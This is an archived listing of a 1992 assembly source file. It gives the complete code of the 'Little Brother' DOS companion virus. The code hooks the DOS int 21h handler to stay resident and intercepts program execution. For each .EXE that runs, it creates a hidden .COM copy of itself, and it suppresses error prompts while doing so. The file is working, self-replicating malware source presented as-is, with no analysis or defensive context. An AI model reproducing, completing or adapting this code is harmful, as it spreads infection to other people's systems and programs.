home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / B.ZIP / BROTHER1.ZIP / LTBRO299.ASM < prev   
Assembly Source File  |  1992-03-08  |  8KB  |  247 lines
  1.  
  2. ;****************************************************************************
  3. ;*                                                                          * 
  4. ;*                       ASM Source Code For:                               *
  5. ;*                 Little Brother Virus -  Version 1                        *
  6. ;*                                                                          *
  7. ;****************************************************************************
  8.  
  9. cseg            segment
  10.                 assume  cs:cseg,ds:cseg,es:nothing
  11.  
  12.                 org     100h
  13.  
  14. FILELEN         equ     end - begin
  15. RESPAR          equ     (FILELEN/16) + 17
  16. VERSION         equ     1
  17. oi21            equ     end
  18. nameptr         equ     end+4
  19. DTA             equ     end+8
  20.  
  21.                 .RADIX  16
  22.  
  23.  
  24. ;****************************************************************************
  25. ;*              Start the program!
  26. ;****************************************************************************
  27.  
  28. begin:          cld
  29.  
  30.                 mov     ax,0DEDEh               ;already installed?
  31.                 int     21h
  32.                 cmp     ah,041h
  33.                 je      cancel
  34.  
  35.                 mov     ax,0044h                ;move program to empty hole
  36.                 mov     es,ax
  37.                 mov     di,0100h
  38.                 mov     si,di
  39.                 mov     cx,FILELEN
  40.         rep     movsb
  41.  
  42.                 mov     ds,cx                   ;get original int21 vector
  43.                 mov     si,0084h
  44.                 mov     di,offset oi21
  45.                 movsw
  46.                 movsw
  47.  
  48.                 push    es                      ;set vector to new handler
  49.                 pop     ds
  50.                 mov     dx,offset ni21
  51.                 mov     ax,2521h
  52.                 int     21h
  53.  
  54. cancel:         ret
  55.  
  56.  
  57. ;****************************************************************************
  58. ;*              File-extensions
  59. ;****************************************************************************
  60.  
  61. EXE_txt         db      'EXE',0
  62. COM_txt         db      'COM',0
  63.  
  64.  
  65. ;****************************************************************************
  66. ;*              Interupt handler 24
  67. ;****************************************************************************
  68.  
  69. ni24:           mov     al,03
  70.                 iret
  71.  
  72.  
  73. ;****************************************************************************
  74. ;*              Interupt handler 21
  75. ;****************************************************************************
  76.  
  77. ni21:           pushf
  78.  
  79.                 cmp     ax,0DEDEh               ;install-check ?
  80.                 je      do_DEDE
  81.  
  82.                 push    dx
  83.                 push    bx
  84.                 push    ax
  85.                 push    ds
  86.                 push    es
  87.  
  88.                 cmp     ax,4B00h                ;execute ?
  89.                 jne     exit
  90.  
  91. doit:           call    infect
  92.  
  93. exit:           pop     es
  94.                 pop     ds
  95.                 pop     ax
  96.                 pop     bx
  97.                 pop     dx
  98.                 popf
  99.  
  100.                 jmp     dword ptr cs:[oi21]     ;call to old int-handler
  101.  
  102. do_DEDE:        mov     ax,04100h+VERSION       ;return a signature
  103.                 popf
  104.                 iret
  105.  
  106.  
  107. ;****************************************************************************
  108. ;*              Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
  109. ;****************************************************************************
  110.  
  111. infect:         cld
  112.  
  113.                 mov     word ptr cs:[nameptr],dx  ;save the ptr to the filename
  114.                 mov     word ptr cs:[nameptr+2],ds
  115.  
  116.                 push    cs                      ;set new DTA
  117.                 pop     ds
  118.                 mov     dx,offset DTA
  119.                 mov     ah,1Ah
  120.                 int     21
  121.  
  122.                 call    searchpoint
  123.                 mov     si,offset EXE_txt       ;is extension 'EXE'?
  124.                 mov     cx,3
  125.         rep     cmpsb
  126.                 jnz     do_com
  127.  
  128. do_exe:         mov     si,offset COM_txt       ;change extension to COM
  129.                 call    change_ext
  130.  
  131.                 mov     ax,3300h                ;get ctrl-break flag
  132.                 int     21
  133.                 push    dx
  134.  
  135.                 xor     dl,dl                   ;clear the flag
  136.                 mov     ax,3301h
  137.                 int     21
  138.  
  139.                 mov     ax,3524h                ;get int24 vector
  140.                 int     21
  141.                 push    bx
  142.                 push    es
  143.  
  144.                 push    cs                      ;set int24 vec to new handler
  145.                 pop     ds
  146.                 mov     dx,offset ni24
  147.                 mov     ax,2524h
  148.                 int     21
  149.  
  150.                 lds     dx,dword ptr [nameptr]  ;create the file (unique name)
  151.                 xor     cx,cx
  152.                 mov     ah,5Bh
  153.                 int     21
  154.                 jc      return1                 
  155.                 xchg    bx,ax                   ;save handle
  156.  
  157.                 push    cs
  158.                 pop     ds
  159.                 mov     cx,FILELEN              ;write the file
  160.                 mov     dx,offset begin
  161.                 mov     ah,40h
  162.                 int     21
  163.                 cmp     ax,cx
  164.                 pushf
  165.  
  166.                 mov     ah,3Eh                  ;close the file
  167.                 int     21
  168.  
  169.                 popf
  170.                 jz      return1                 ;all bytes written?
  171.  
  172.                 lds     dx,dword ptr [nameptr]  ;delete the file
  173.                 mov     ah,41h
  174.                 int     21
  175.  
  176. return1:        pop     ds                      ;restore int24 vector
  177.                 pop     dx
  178.                 mov     ax,2524h
  179.                 int     21
  180.  
  181.                 pop     dx                      ;restore ctrl-break flag
  182.                 mov     ax,3301h
  183.                 int     21
  184.  
  185.                 mov     si,offset EXE_txt       ;change extension to EXE
  186.                 call    change_ext
  187.  
  188. return:         ret
  189.  
  190. do_com:         call    findfirst               ;is the file a virus?
  191.                 cmp     word ptr cs:[DTA+1Ah],FILELEN
  192.                 jne     return
  193.                 mov     si,offset EXE_txt       ;does the EXE-variant exist?
  194.                 call    change_ext
  195.                 call    findfirst
  196.                 jnc     return
  197.                 mov     si,offset COM_txt       ;change extension to COM
  198.                 jmp     short change_ext
  199.  
  200.  
  201. ;****************************************************************************
  202. ;*              Find the file
  203. ;****************************************************************************
  204.  
  205. findfirst:      lds     dx,dword ptr [nameptr]
  206.                 mov     cl,27h
  207.                 mov     ah,4Eh
  208.                 int     21
  209.                 ret                
  210.  
  211.  
  212. ;****************************************************************************
  213. ;*              change the extension of the filename (CS:SI -> ext)
  214. ;****************************************************************************
  215.  
  216. change_ext:     call    searchpoint
  217.                 push    cs
  218.                 pop     ds
  219.                 movsw
  220.                 movsw
  221.                 ret
  222.  
  223.  
  224. ;****************************************************************************
  225. ;*              search begin of extension  
  226. ;****************************************************************************
  227.  
  228. searchpoint:    les     di,dword ptr cs:[nameptr]
  229.                 mov     ch,0FFh
  230.                 mov     al,'.'
  231.         repnz   scasb
  232.                 ret
  233.  
  234.  
  235. ;****************************************************************************
  236. ;*              Text and Signature
  237. ;****************************************************************************
  238.  
  239.                 db      'Little Brother',0
  240.  
  241. end:
  242.  
  243. cseg            ends
  244.                 end     begin
  245.  
  246.  
  247.